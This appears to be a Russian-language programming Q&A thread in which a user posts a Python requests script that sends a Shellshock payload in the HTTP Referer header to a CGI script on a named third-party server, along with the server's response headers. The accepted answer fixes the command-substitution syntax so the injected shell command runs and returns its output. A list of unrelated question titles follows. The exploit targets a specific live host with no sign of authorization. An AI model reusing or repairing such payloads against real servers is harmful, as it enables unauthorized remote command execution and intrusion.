Как выполнить команду bash на сервере из заголовка http, используя python?
1
У меня есть следующий скрипт в python
headers = {'Referer': """() { :;}; y="($ls)";echo 'ls_result: '$y; """}
r = requests.get("http://manticore.2y.net/cgi-bin/dlwct.sh",headers=headers)
а также
r.headers
является
{
'x-rdir': '""', 'x-vps': 'yes',
'transfer-encoding': 'chunked',
'server': 'Apache/1.3.29',
'connection': 'close',
'date': 'Thu, 23 Oct 2014 09:13:47 GMT',
'ls_result': '()',
'content-type': 'text/html'
}
когда я передаю y = "(ls)" в заголовке. Я получаю 'ls_result': '(ls)' в заголовке ответа. зачем $ сбрасывать с моего ввода? как можно перечислить каталог в заголовке ответа? PS: это для образовательной цели
1 ответ
2
Лучший ответ
Синтаксис для выполнения команды и назначение ее вывода переменной:
y="$(ls)"
У вас в скобках значение $, оно должно быть снаружи.
Обратите внимание, что ваш код будет выполнять только команду оболочки, если вы не исправили уязвимость ShellShock.
Barmar
Поделиться
Ещё вопросы
- 0Скрыть элементы при щелчке вне запускающего элемента
- 0включить часть сайта в мой сайт
- 0Изменить размер Div динамически
- 1Позвоните классу через минуту после инициализации Eclipse
- 0Путь к изображению не работает в рамках YII?
- 0Удаленное подключение к MySQL на EC2 без SSH-туннелирования
- 1Java Custom enum
- 0Почему в моей таблице нет границ?
- 0Дочернее состояние с UI-роутером не разрешено
- 0Пройдите через n-арное дерево
- 0как получить сообщение из следующих в этих таблицах
- 1Как обновлять графический интерфейс tkinter при каждом движении?
- 0Оператор PHP IF возвращает истинное значение только один раз в цикле while
- 1Механика исполнения ворот в Maven
- 0Вопрос группы Laravel Route
- 1Пользовательские функции Pandas в возвращении значений столбцов
- 1Фоновые задачи для регулярной синхронизации файлов
- 0получать события из базы данных и размещения в режиме просмотра календаря (Android)
- 0Я хочу выбрать каждое значение в раскрывающемся списке, и он будет динамически выполнять модульное тестирование с использованием транспортира
- 1Выходной файл не содержит все строки, которые я скопировал из источника
- 0JQuery, div отображается, но не исчезает
- 0CSS кнопки не будут в центре моей навигации
- 1Горизонтальное ограничение зрения в ConstraintLayout
- 1Установленные флажки в списке через запятую со словом «и» в конце на C #
- 0$ .getJson () предел ответа
- 1Модульное тестирование AlertDialog - java.lang.VerifyError: Неверный тип в стеке операндов
- 1Почему рисовать штриховые линии на холсте не работает?
- 0Индикатор выполнения во время работы в консольном приложении
- 1Тестирование toString, но это не удается?
- 0Разрешить регулярное выражение с обратной косой чертой
- 0Boost Unit Test: поймать неудачный тест
- 1SimpleFactory, FactoryMethod, Абстрактная фабрика (твердый пример)
- 1Чтение символов в фоновом приложении
- 0SQL Получить два столбца с Да или Нет
- 0Как использовать QToolButton
- 0Как поддерживать выбранные пользователем локали в приложении AngularJS
- 0Выбрать и упорядочить список по другому условию (Критерии внутреннего объединения в спящий режим)
- 0Как программно установить значение DurationBox в jQuery Mobile DateBox2?
- 0C ++ Help. Массивы не работают с целыми числами
- 1Pandas applymap ошибка памяти
- 1Удаление активности запуска из стека на pendingIntent
- 1C # Формат даты {0: t} - {0: t + 1} 00:00 - 01:00
- 0Я получаю исключение SQL: индекс параметра выходит за пределы диапазона (1> число параметров, которое равно 0) ошибка
- 1Angular CLI использует SystemJS?
- 0Используйте переменную javascript вместо файла json
- 0Неожиданные результаты с преобразованием строк wchar_t и c_str
- 1Я хочу нарисовать квадрат на картинке C #
- 1Не удается найти сбой символа в тесте Junit
- 0Жасмин - модульное тестирование директивы: получение undefined не является объектом
- 0jQuery показать скрыть некоторые элементы
